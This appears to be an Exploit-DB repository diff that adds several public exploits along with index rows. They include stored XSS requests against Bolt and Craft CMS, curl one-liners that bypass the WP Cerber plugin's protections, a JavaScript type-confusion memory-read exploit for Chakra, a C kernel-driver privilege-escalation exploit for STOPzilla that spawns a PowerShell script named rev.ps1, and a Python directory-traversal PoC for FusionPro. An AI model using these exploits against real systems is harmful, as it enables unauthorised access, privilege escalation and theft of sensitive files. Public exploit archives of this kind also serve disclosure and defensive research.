content_edit%5B_token%5D=u1EA_Zhor_EwrIyqIt-PLLK02DccGgZDDWFQm1325_8&editreferrer=&contenttype=pages&title=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&slug=script-alert-ismailtasdelen-script&image%5Bfile%5D=2019-03%2Fimg-src-x-onerror-prompt-1-.png&files%5B%5D=&teaser=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&body=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2019-03-04+08%3A24%3A47&datedepublish=&ownerid=1&_live-editor-preview=&content_edit%5Bsave%5D=1

31
exploits/php/webapps/46496.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: Craft CMS 3.1.12 Pro - Cross-Site Scripting
# Date: 2019-03-04
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://craftcms.com/
# Software Link : https://github.com/craftcms/cms
# Software : Craft CMS 3.1.12 Pro
# Version : 3.1.12 Pro
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : CVE-2019-9554
# In the 3.1.12 Pro version of the Craft CMS web application, the XSS vulnerability has been discovered
# in the header insertion field when adding source code.
# HTTP POST Request :
POST /XXX/s/admin/entries/news/258-craft-cms-3-1-12-pro-xss-test HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/XXX/s/admin/entries/news/258-craft-cms-3-1-12-pro-xss-test
Content-Type: application/x-www-form-urlencoded
Content-Length: 1936
DNT: 1
Connection: close
Cookie: CraftSessionId=2ea7nf0jqr0dtl3ioesmlpibfn; CRAFT_CSRF_TOKEN=deccdc1b2ef00dd8580186987fe54e3cdf92305c6150cffb523f392540a2d4aba%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A208%3A%22iuw8Yd67pzxgeP7PrY9zqL5nYEB0Uor6JeS779fM%7Cf42be7b0c353ba14582c1e682a6150947da39c970d31f5cbc3ddc4c0bbe14608iuw8Yd67pzxgeP7PrY9zqL5nYEB0Uor6JeS779fM%7C1%7C%242a%2413%245j8bSRoKQZipjtIg6FXWR.kGRR3UfCL.QeMIt2yTRH1.hCNHLQKtq%22%3B%7D; 1031b8c41dfff97a311a7ac99863bdc5_identity=9804f2668edfba25525881f3badabcfe5adb1d71f4dcb4504daee11a78bc94a3a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_identity%22%3Bi%3A1%3Bs%3A197%3A%22%5B%221%22%2C%22%5B%5C%22dQCnIq3FbN0KsbTg8nbPQxV3JvEWqbBzqXjf0nwbvJDN0LjgArYGZe4WaYfo3AiYzm8CaeKPjT9CUw_8mnAd_D89-nf39hYXRRoq%5C%22%2Cnull%2C%5C%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A65.0%29+Gecko%2F20100101+Firefox%2F65.0%5C%22%5D%22%2C3600%5D%22%3B%7D; 1031b8c41dfff97a311a7ac99863bdc5_username=53dcb198f73d427f239351d0c5ac1bb1e4fbba88fab3cc128854b0232098896da%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D
Upgrade-Insecure-Requests: 1
CRAFT_CSRF_TOKEN=dgLN-H1XWhJgLIiYSYl52Z4wVJZttVH_wDyF9k5Bi00GXCSSTri7oLF9innUOlavPu4AhcUUuEoHMpGSl7-GbdK9oBrDQT5p3BN2frKMuzd6IgTMdbWhgSXqx6pj4hV1UyLi8rZBnAqaMQT1eP_1_4X0fqZYp5Q4GfmlV7iq26NdVxnY_X03CauMkmElBmRoa-6A_U8FGYjg2ipWdesOvZa18UZsUHMNWUWBmYzHJc-82MSRtiZ19DS1iTzV74nlnSaY3vva5oBQFEDtnwZhqR93usAkM2wlEFbw_yzZTonsaW3sHPlkkZl5x8YbLvl7TDl3pXmB3e3NG75Ltl9hzQ6NM7D2dtl7MwepoPSO41vqj8Es8nQOUOgkEh-BtdgOTRJg_0TTlOJHifTOB4EhFmNAgJeHdao6olhxgkCmkcmyhATeP8LED0mL_G7C25eWMw5cms0oWHudxvcyEjFdDiaSsYFrN3is0ekOYx_TbO7E2roXNjkDZy0M5q_Kn3KdkrODw-QVIJJ3-adtsKLAka9fzIyz68joE1oIoc5NFdg%3D&action=entries%2Fsave-entry&redirect=ac40ade69b3fe7bc96c8157907aae4128d2b64f411148be4af2141edea85b42fentries%2Fnews&sectionId=2&entryId=258&title=Craft+CMS+3.1.12+Pro+-+XSS+TEST&fields%5BfeaturedEntry%5D=&fields%5BfeaturedImage%5D=&fields%5BshortDescription%5D=%3Cp%3ECraft+CMS+3.1.12+Pro+-+XSS+TEST%3C%2Fp%3E&fields%5Bheading%5D=Craft+CMS+3.1.12+Pro+-+XSS+TEST&fields%5Bsubheading%5D=Craft+CMS+3.1.12+Pro+-+XSS+TEST&fields%5BarticleBody%5D=&fields%5BarticleBody%5D%5B259%5D%5Btype%5D=text&fields%5BarticleBody%5D%5B259%5D%5Benabled%5D=1&fields%5BarticleBody%5D%5B259%5D%5Bfields%5D%5Btext%5D=%3Cfigure%3E%3Ca+href%3D%22%22%3E%3Cimg+src%3D%22https%3A%2F%2Fdemo.craftcms.com%2F3Rdj0OGqru%2Fs%2Fassets%2Fsite%2F-.png%23asset%3A257%3Aurl%22+alt%3D%22%26quot%3B%3Ealert%28%26quot%3Bismailtasdelen%26quot%3B%29%22+title%3D%22%26quot%3B%3Ealert%28%26quot%3Bismailtasdelen%26quot%3B%29%22+data-image%3D%228ilh6edpse56%22%3E%3C%2Fa%3E%3Cfigcaption%3E%22%26gt%3B%3C%2Ffigcaption%3E%3C%2Ffigure%3E&fields%5BarticleBody%5D%5B259%5D%5Bfields%5D%5Bposition%5D=left&typeId=2&slug=craft-cms-3-1-12-pro-xss-test&author=&author%5B%5D=1&postDate%5Bdate%5D=3%2F4%2F2019&postDate%5Btimezone%5D=UTC&postDate%5Btime%5D=8%3A55+AM&postDate%5Btimezone%5D=UTC&expiryDate%5Bdate%5D=&expiryDate%5Btimezone%5D=UTC&expiryDate%5Btime%5D=&expiryDate%5Btimezone%5D=UTC&enabled=1&revisionNotes=

65
exploits/php/webapps/46497.txt Normal file
View file

@ -0,0 +1,65 @@
# Exploit Title: WordPress Cerber Security, Antispam & Malware Scan - Multiple Bypass Vulnerabilities
# Type: WordPress Plugin
# Date: 2019-03-04
# Active installs: 100,000+
# Version: 8.0
# Software Link: https://wordpress.org/plugins/wp-cerber/
# Exploit Author: ed0x21son
# Category: WebApps, WordPress
# Tested on: Linux/WordPress 5.1
[Vulnerabilities]
#1: Stop user enumeration bypass:
U can bypass user enumeration protection if u use Post method instead of Get.
curl http://localhost/ -d author=1
#2: Protect admin scripts bypass:
U can bypass admin scripts protection if u add one or more slashes to the uri.
curl 'http://localhost/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils'
curl 'http://localhost/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar'
#3: Protects wp-login.php, wp-signup.php and wp-register.php from attacks bypass:
U can bypass this protection if u encode any character in the uri.
curl http://localhost/wp-login%2ephp
curl -v http://localhost/wp-signup%2ephp
curl -v http://localhost/wp-register%2ephp
#4: Hide login URL bypass:
U can bypass if u encode any character in the uri, Cerber will return the secret slug in the Location header field.
curl -I http://localhost/wp-%61dmin/
#5: Stop user enumeration via REST API bypass:
U can bypass if u insert /index.php/ between domain and rest route.
curl http:/localhost/index.php/wp-json/wp/v2/users/
#6: Disable REST API bypass:
Same above.
curl http:/localhost/index.php/wp-json/wp/v2/
--ed0x21son

184
exploits/windows/dos/46485.html Normal file
View file

@ -0,0 +1,184 @@
<html>
<script>
/*
# Exploit Title: [getting Read permission through Type Confusion]
# Date: [date]
# Exploit Author: [Fahad Aid Alharbi]
# Vendor Homepage: [https://www.microsoft.com/en-us/]
# Version: [Chakra 1_11_4] (REQUIRED)
# Tested on: [Windows 10]
# CVE : [cve-2019-0539]
*/
/* author @0x4142 => Fahad Aid Alharbi
* cve-2019-0539
* Getting Read &_^
* date 27 Feb , 2019
*/
var convert = new ArrayBuffer(0x100);
var u32 = new Uint32Array(convert);
var f64 = new Float64Array(convert);
var BASE = 0x100000000;
function hex(x) {
return `0x${x.toString(16)}`
}
function bytes_to_u64(bytes) {
return (bytes[0]+bytes[1]*0x100+bytes[2]*0x10000+bytes[3]*0x1000000
+bytes[4]*0x100000000+bytes[5]*0x10000000000);
}
function i2f(x) {
u32[0] = x % BASE;
u32[1] = (x - (x % BASE)) / BASE;
return f64[0];
}
function f2i(x) {
f64[0] = x;
return u32[0] + BASE * u32[1];
}
obj = {}
obj.a = 0x41;
obj.b = 0x42;
obj.c = 0x41;
obj.d = 0x42;
obj.e = 0x40;
obj.f = 0x40;
obj.g = 0x90;
obj.h = 0x90;
obj.i = 0x90;
t = new ArrayBuffer(0x200);
newL = 0x1000;
hax = new ArrayBuffer(0x2000);
read_me = 0;
function hit_to_read(t){
obj.h = hax; // set ta->buffer to hax
obj.i = newL; // update target's length
read_me = new Float64Array(t);
return read_me;
}
function read(r,read_me)
{
read_me[7] = i2f(r); // setup hax->buffer
//hax = new ArrayBuffer(0x1000);
return hex(f2i(read_me[7]))
}
function cout(f){return document.write(f);}
function opt(o, c, value) {
o.c = 1
//o.a = "HELLO"
// o.b = 3;
//o.e = 1
class A extends c {
}
o.a = value // will overwrite rcx , rdx , rax
//o.b = value => chakra!Js::RecyclableObject::HasOnlyWritableDataProperties+0xe:
//o.b = 0x42424242
o.c = 555555
// o.d = 4
}
function pwn() {
for (let i = 0; i < 0x1000; i++) {
let o = {a: 1, b: 2,c:3};
opt(o, (function () {}), {});
}
let o = {a: 2222, b: 2,c:4,d:5};
let cons = function () {};
cons.prototype = o;
/* line 120
auxSlots *p
__Vfptr | type | 0x00000001234 | 0x0
*/
opt(o, cons, obj);
o.f = t
read_me = hit_to_read(t);
cout("[+] vtable pointer is " + hex(f2i(read_me[0])));
vtable = hex(f2i(read_me[0]));
buffer_addr = f2i(read_me[7]);
Chakrabase = hex(vtable - 0x59a3c0)
cout("<br>")
cout("[+] ChakraBase : " + Chakrabase)
cout("<br>buffer_addr: " + read(buffer_addr + 40 , read_me))
ThreadContext = read(Chakrabase - 0xffec5448,read_me)
Ntdll = read(Chakrabase - 0xdd9a0000,read_me)
cout("<br>")
cout("[+] ThreadContext : " + ThreadContext)
cout("<br>")
cout("[+] Ntdl : " + Ntdll)
}
pwn();
/*
s=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
chakra!Js::SimpleDictionaryTypeHandlerBase<unsigned short,Js::PropertyRecord const * __ptr64,0>::GetPropertyFromDescriptor<0>+0x59:
00007ffc`d61f4109 4c8b14c8 mov r10,qword ptr [rax+rcx*8] ds:00010000`41414141=????????????????
*/
/*
s=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
chakra!Js::SimpleDictionaryTypeHandlerBase<unsigned short,Js::PropertyRecord const * __ptr64,0>::GetPropertyFromDescriptor<0>+0x59:
00007ffc`d61f4109 4c8b14c8 mov r10,qword ptr [rax+rcx*8] ds:00010000`41414141=????????????????
*/
</script></html>

448
exploits/windows/local/45496.c Normal file
View file

@ -0,0 +1,448 @@
/*
3y3t3m th!s - Ivan Ivanovic Ivanov Иван-дурак
недействительный 31337 Team
clone of https://www.exploit-db.com/exploits/45401
deb yaaaa
win7 narrrr (fails)
ch@ng3 p@yl0@d!!!!!!!!!!!!!
*/
#include <stdio.h>
#include <windows.h>
#include <winternl.h>
#include <sddl.h>
#pragma comment(lib,"winsta.lib")
#pragma comment(lib,"advapi32.lib")
#define SystemHandleInformation 16
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
typedef unsigned __int64 QWORD;
typedef struct _SID_BUILTIN
{
UCHAR Revision;
UCHAR SubAuthorityCount;
SID_IDENTIFIER_AUTHORITY IdentifierAuthority;
ULONG SubAuthority[2];
} SID_BUILTIN, *PSID_BUILTIN;
typedef struct _SID_INTEGRITY
{
UCHAR Revision;
UCHAR SubAuthorityCount;
SID_IDENTIFIER_AUTHORITY IdentifierAuthority;
ULONG SubAuthority[1];
} SID_INTEGRITY, *PSID_INTEGRITY;
typedef NTSYSAPI NTSTATUS (NTAPI *_ZwCreateToken)(
OUT PHANDLE TokenHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN TOKEN_TYPE Type,
IN PLUID AuthenticationId,
IN PLARGE_INTEGER ExpirationTime,
IN PTOKEN_USER User,
IN PTOKEN_GROUPS Groups,
IN PTOKEN_PRIVILEGES Privileges,
IN PTOKEN_OWNER Owner,
IN PTOKEN_PRIMARY_GROUP PrimaryGroup,
IN PTOKEN_DEFAULT_DACL DefaultDacl,
IN PTOKEN_SOURCE Source
);
typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
int GetWindowsVersion()
{
int ver = 0;
OSVERSIONINFO osvi;
ZeroMemory(&osvi, sizeof(OSVERSIONINFO));
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&osvi);
if (osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 1) ver = 1; // Windows 7
if (osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 2) ver = 2; // Windows 10
return ver;
}
int AddAccountToAdminGroup(HANDLE hTokenElevated)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
DWORD currentusersize;
char currentuser[100];
char netcommand[15000];
ZeroMemory(&si, sizeof(STARTUPINFO));
ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
si.cb = sizeof(STARTUPINFO);
currentusersize = sizeof(currentuser);
if (!GetUserName(currentuser, &currentusersize))
{
printf("\n[-] Failed to obtain current username: %d\n\n", GetLastError());
return -1;
}
printf("\n[*] Creating new process...");
// The command or binary file to be executed can be changed here
sprintf(netcommand, "powershell.exe .\\rev.ps1");
if (!CreateProcessAsUser(hTokenElevated, NULL, netcommand, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] Failed to execute command (%d) Run exploit again\n\n", GetLastError());
return -1;
}
printf("\n[+] Executed command successfully\n");
return 0;
}
PTOKEN_PRIVILEGES SetPrivileges()
{
PTOKEN_PRIVILEGES privileges;
LUID luid;
int NumOfPrivileges = 5;
int nBufferSize;
nBufferSize = sizeof(TOKEN_PRIVILEGES) + sizeof(LUID_AND_ATTRIBUTES) * NumOfPrivileges;
privileges = (PTOKEN_PRIVILEGES) LocalAlloc(LPTR, nBufferSize);
privileges->PrivilegeCount = NumOfPrivileges;
LookupPrivilegeValue(NULL, SE_TCB_NAME, &luid);
privileges->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[0].Luid = luid;
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid);
privileges->Privileges[1].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[1].Luid = luid;
LookupPrivilegeValue(NULL, SE_ASSIGNPRIMARYTOKEN_NAME, &luid);
privileges->Privileges[2].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[2].Luid = luid;
LookupPrivilegeValue(NULL, SE_TAKE_OWNERSHIP_NAME, &luid);
privileges->Privileges[3].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[3].Luid = luid;
LookupPrivilegeValue(NULL, SE_IMPERSONATE_NAME, &luid);
privileges->Privileges[4].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[4].Luid = luid;
return privileges;
}
PSID GetLocalSystemSID()
{
PSID psid = NULL;
SID_IDENTIFIER_AUTHORITY sidAuth = SECURITY_NT_AUTHORITY;
if (AllocateAndInitializeSid(&sidAuth, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &psid) == FALSE)
{
printf("\n[-] AllocateAndInitializeSid failed %d\n", GetLastError());
return NULL;
}
return psid;
}
LPVOID GetInfoFromToken(HANDLE hToken, TOKEN_INFORMATION_CLASS type)
{
DWORD dwLengthNeeded;
LPVOID lpData = NULL;
if (!GetTokenInformation(hToken, type, NULL, 0, &dwLengthNeeded) && GetLastError() != ERROR_INSUFFICIENT_BUFFER)
{
printf("\n[-] Failed to initialize GetTokenInformation %d", GetLastError());
return NULL;
}
lpData = (LPVOID)LocalAlloc(LPTR, dwLengthNeeded);
GetTokenInformation(hToken, type, lpData, dwLengthNeeded, &dwLengthNeeded);
return lpData;
}
QWORD TokenAddressCurrentProcess(HANDLE hProcess, DWORD MyProcessID)
{
_NtQuerySystemInformation NtQuerySystemInformation;
PSYSTEM_HANDLE_INFORMATION pSysHandleInfo;
ULONG i;
PSYSTEM_HANDLE_ENTRY pHandle;
QWORD TokenAddress = 0;
DWORD nSize = 4096;
DWORD nReturn;
BOOL tProcess;
HANDLE hToken;
if ((tProcess = OpenProcessToken(hProcess, TOKEN_QUERY, &hToken)) == FALSE)
{
printf("\n[-] OpenProcessToken() failed (%d)\n", GetLastError());
return -1;
}
NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation)
{
printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
return -1;
}
do
{
nSize += 4096;
pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION) HeapAlloc(GetProcessHeap(), 0, nSize);
} while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH);
printf("\n[i] Current process id %d and token handle value %u", MyProcessID, hToken);
for (i = 0; i < pSysHandleInfo->Count; i++)
{
if (pSysHandleInfo->Handle[i].OwnerPid == MyProcessID && pSysHandleInfo->Handle[i].HandleValue == hToken)
{
TokenAddress = pSysHandleInfo->Handle[i].ObjectPointer;
}
}
HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
return TokenAddress;
}
HANDLE CreateUserToken(HANDLE hToken)
{
_ZwCreateToken ZwCreateToken;
HANDLE hTokenElevated;
NTSTATUS status;
int i;
DWORD dwSize = 0;
TOKEN_USER userToken;
PTOKEN_PRIVILEGES privileges = NULL;
PTOKEN_OWNER ownerToken = NULL;
PTOKEN_GROUPS groups = NULL;
PTOKEN_PRIMARY_GROUP primary_group = NULL;
PTOKEN_DEFAULT_DACL default_dacl = NULL;
PLUID pluidAuth;
LARGE_INTEGER li;
PLARGE_INTEGER pli;
LUID authid = SYSTEM_LUID;
LUID luid;
PSID_AND_ATTRIBUTES pSid;
SID_BUILTIN TkSidLocalAdminGroup = { 1, 2, { 0, 0, 0, 0, 0, 5 }, { 32, DOMAIN_ALIAS_RID_ADMINS } };
SECURITY_QUALITY_OF_SERVICE sqos = { sizeof(sqos), SecurityImpersonation, SECURITY_STATIC_TRACKING, FALSE };
OBJECT_ATTRIBUTES oa = { sizeof(oa), 0, 0, 0, 0, &sqos };
TOKEN_SOURCE SourceToken = { { '!', '!', '!', '!', '!', '!', '!', '!' }, { 0, 0 } };
SID_IDENTIFIER_AUTHORITY nt = SECURITY_NT_AUTHORITY;
PSID lpSidOwner = NULL;
SID_INTEGRITY IntegritySIDSystem = { 1, 1, SECURITY_MANDATORY_LABEL_AUTHORITY, SECURITY_MANDATORY_SYSTEM_RID };
ZwCreateToken = (_ZwCreateToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "ZwCreateToken");
if (ZwCreateToken == NULL)
{
printf("[-] Unable to resolve ZwCreateToken: %d\n\n", GetLastError());
return NULL;
}
groups = (PTOKEN_GROUPS)GetInfoFromToken(hToken, TokenGroups);
primary_group = (PTOKEN_PRIMARY_GROUP)GetInfoFromToken(hToken, TokenPrimaryGroup);
default_dacl = (PTOKEN_DEFAULT_DACL)GetInfoFromToken(hToken, TokenDefaultDacl);
pSid = groups->Groups;
for (i=0; i<groups->GroupCount; i++, pSid++)
{
PISID piSid = (PISID)pSid->Sid;
if (pSid->Attributes & SE_GROUP_INTEGRITY)
{
memcpy(pSid->Sid, &IntegritySIDSystem, sizeof(IntegritySIDSystem));
}
if (piSid->SubAuthority[piSid->SubAuthorityCount - 1] == DOMAIN_ALIAS_RID_USERS)
{
memcpy(piSid, &TkSidLocalAdminGroup, sizeof(TkSidLocalAdminGroup)); // Found RID_USERS membership, overwrite with RID_ADMINS
pSid->Attributes = SE_GROUP_ENABLED;
}
else
{
pSid->Attributes &= ~SE_GROUP_USE_FOR_DENY_ONLY;
pSid->Attributes &= ~SE_GROUP_ENABLED;
}
}
pluidAuth = &authid;
li.LowPart = 0xFFFFFFFF;
li.HighPart = 0xFFFFFFFF;
pli = &li;
AllocateAndInitializeSid(&nt, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &lpSidOwner);
userToken.User.Sid = lpSidOwner;
userToken.User.Attributes = 0;
AllocateLocallyUniqueId(&luid);
SourceToken.SourceIdentifier.LowPart = luid.LowPart;
SourceToken.SourceIdentifier.HighPart = luid.HighPart;
ownerToken = (PTOKEN_OWNER) LocalAlloc(LPTR, sizeof(PSID));
ownerToken->Owner = GetLocalSystemSID();
privileges = SetPrivileges();
status = ZwCreateToken(&hTokenElevated,
TOKEN_ALL_ACCESS,
&oa,
TokenPrimary,
pluidAuth,
pli,
&userToken,
groups,
privileges,
ownerToken,
primary_group,
default_dacl,
&SourceToken);
if (status == STATUS_SUCCESS)
{
printf("\n[+] New token created successfully\n");
return hTokenElevated;
}
else
{
// printf("\n[-] Failed to create new token %08x\n", status);
return NULL;
}
if (lpSidOwner) FreeSid(lpSidOwner);
if (groups) LocalFree(groups);
if (privileges) LocalFree(privileges);
if (primary_group) LocalFree(primary_group);
if (default_dacl) LocalFree(default_dacl);
if (ownerToken) { if(ownerToken->Owner) FreeSid(ownerToken->Owner); LocalFree(ownerToken); }
return NULL;
}
int main(int argc, char *argv[])
{
QWORD TokenAddressTarget;
QWORD SepPrivilegesOffset = 0x40;
QWORD PresentByteOffset;
QWORD EnableByteOffset;
QWORD TokenAddress;
HANDLE hDevice;
char devhandle[MAX_PATH];
DWORD dwRetBytes = 0;
HANDLE hTokenCurrent;
HANDLE hTokenElevate;
printf("-------------------------------------------------------------------------------\n");
printf(" STOPzilla AntiMalware (szkg64.sys) Arbitrary Write EoP Exploit \n");
printf(" Tested on 64bit Windows 7 / Windows 10 (1803) \n");
printf("-------------------------------------------------------------------------------\n");
TokenAddress = TokenAddressCurrentProcess(GetCurrentProcess(), GetCurrentProcessId());
printf("\n[i] Address of current process token 0x%p", TokenAddress);
TokenAddressTarget = TokenAddress + SepPrivilegesOffset;
printf("\n[i] Address of _SEP_TOKEN_PRIVILEGES 0x%p will be overwritten\n", TokenAddressTarget);
PresentByteOffset = TokenAddressTarget + 0x0;
printf("[i] Present bits at 0x%p will be overwritten\n", PresentByteOffset);
EnableByteOffset = TokenAddressTarget + 0x8;
printf("[i] Enabled bits at 0x%p will be overwritten", EnableByteOffset);
sprintf(devhandle, "\\\\.\\%s", "msprocess");
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
printf("\n[-] Open %s device failed\n\n", devhandle);
return -1;
}
else
{
printf("\n[+] Open %s device successful", devhandle);
}
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hTokenCurrent))
{
printf("[-] Failed OpenProcessToken() %d\n\n", GetLastError());
return NULL;
}
printf("[+] OpenProcessToken() handle opened successfully");
do
{
printf("\n[*] Overwriting _SEP_TOKEN_PRIVILEGES bits");
DeviceIoControl(hDevice, 0x80002063, NULL, 0, (LPVOID)PresentByteOffset, 0, &dwRetBytes, NULL);
DeviceIoControl(hDevice, 0x80002063, NULL, 0, (LPVOID)EnableByteOffset, 0, &dwRetBytes, NULL);
hTokenElevate = CreateUserToken(hTokenCurrent);
Sleep(500);
} while (hTokenElevate == NULL);
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows 7");
printf("\n[*] Exploit will NOT be run!");
}
if (GetWindowsVersion() == 2)
{
printf("[i] Running Windows 10");
AddAccountToAdminGroup(hTokenElevate);
}
else if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not tested on this OS\n\n");
}
CloseHandle(hDevice);
return 0;
}

150
exploits/windows/webapps/46487.py Executable file
View file

File diff suppressed because one or more lines are too long

69
exploits/windows/webapps/46494.py Executable file
View file

@ -0,0 +1,69 @@
#!/usr/bin/env python
'''
# Exploit Title: MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal
# Date: 02/11/2019
# Exploit Author: 0v3rride
# Vendor Homepage: https://marcom.com/
# Software Link: http://static.pti.com/downloads/FusionPro/Win32/FusionPro_9.3.36_Setup.exe
# Version: < 10.0 (version tested was 9.3)
# Executable/Service: FPProducerInternetServer.exe v9.03.0036.0000 (FusionPro Internet Request Handler)
# Tested on: Windows
# CVE : 2019-7751
Summary
A directory traversal and local file inclusion vulnerability in the FPProducerInternetServer.exe service/utility in Ricoh MarcomCentral's, formerly PTI Marketing, FusionPro VDP Creator allows a remote attacker to list or enumerate sensitive contents of files. Furthermore, this could allow for privilege escalation by dumping the local machine's SAM and SYSTEM database files, access to common files that contain plaintext credentials, and possibly remote code execution.
Attack Details
Exploiting this vulnerability is extremely simple. This could be done from a browser like Firefox. Simply navigate the affected host (e.g. <http://><host.domain.tld>:<port#>/Windows/System32/drivers/etc/hosts. No slash-dot-dots (/../..) are required, but you can add some if you want. Note that the slashes are forward slashes! By default, the service sets up a listener on port 8080.
Vendor Response
The response I've received from the vendor suggests that they care very little about the issue despite the criticality of this class of vulnerability. I'll quote the vendors response, "just delete it". Delete what exactly? Uninstall FusionPro VDP Creator? Or should one just delete FPProducerInternetServer.exe? The vendor also wasn't clear if any of the more current versions (10.0 and 10.1) are affected. All that was sent was, "since v9.3 there have been changes to this utility to restrict access to folders". It is possible that these versions are also susceptible to the issue as well based on the response from the vendor.
Resolution
Thankfully I found some better solutions other than "just delete it".
Open services.msc
Look for the service named FusionPro Internet Request Handler
Right-click and open the properties Window
Stop the service if it's running
Select disabled startup type
Or you could write a PowerShell script that does it automatically for you using the set-service and get-service cmdlets.
The nuclear option would be deleting the following executable, C:\Windows\SysWOW64\FPProducerInternetServer.exe. However, I don't know what affect this will have on the machine and FusionPro VDP Creator software. You could take a gamble and upgrade to the latest version .
'''
#######################
# PoC by: 0v3rride #
# DoC: February 2019 #
#######################
from requests import *
from sys import *;
def travel(fullurl):
r = get(fullurl);
print("-" * 80 + "\n[i]: Supplied URL: {}".format(fullurl))
print("-" * 80 + "\n[i]: Response Status Code: {}".format(r.status_code));
print("-" * 80 + "\n[i]: Response Headers:\n");
for hdr in r.headers:
print("{}: {}".format(hdr, r.headers[hdr]));
print("-" * 80 + "\n[i]: RAW DATA RETURNED FROM RESPONSE: \n{}".format(r.text));
if len(argv) < 3:
print("[i]: Usage -- ./poc <http(s)://FQDN or http(s)://<IP address>:<Port #> <file to query on the local machine that is affected (e.g. /windows/system32/drivers/etc/hosts)");
print("[i]: Path needs to start with a '/'.");
else:
try:
print("[i]: https://github.com/0v3rride/");
print("-" * 80 + "\n[!] Sending the request...");
travel(argv[1] + argv[2]);
except RequestException as re:
print(re.strerror);
finally:
print("-" * 80 + "\n[!] Done!");

23
files_exploits.csv
View file

@ -6176,6 +6176,7 @@ id,file,description,date,author,type,platform,port
45762,exploits/windows_x86/dos/45762.py,"Arm Whois 3.11 - Denial of Service (PoC)",2018-11-01,"Yair Rodríguez Aparicio",dos,windows_x86,
45769,exploits/windows_x86-64/dos/45769.py,"WinMTR 0.91 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
45770,exploits/windows_x86-64/dos/45770.py,"CdCatalog 2.3.1 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
46485,exploits/windows/dos/46485.html,"Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion",2019-03-04,"Fahad Aid Alharbi",dos,windows,
45772,exploits/windows_x86-64/dos/45772.py,"Zint Barcode Generator 2.6 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
45781,exploits/windows_x86-64/dos/45781.py,"Softros LAN Messenger 9.2 - Denial of Service (PoC)",2018-11-05,"Victor Mondragón",dos,windows_x86-64,
45786,exploits/ios/dos/45786.txt,"FaceTime - RTP Video Processing Heap Corruption",2018-11-06,"Google Security Research",dos,ios,
@ -6306,6 +6307,7 @@ id,file,description,date,author,type,platform,port
46356,exploits/android/dos/46356.txt,"Android - binder Use-After-Free via fdget() Optimization",2019-02-12,"Google Security Research",dos,android,
46357,exploits/android/dos/46357.txt,"Android - binder Use-After-Free of VMA via race Between reclaim and munmap",2019-02-12,"Google Security Research",dos,android,
46358,exploits/asp/dos/46358.py,"Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow",2019-02-12,"Kaustubh G. Padwad",dos,asp,80
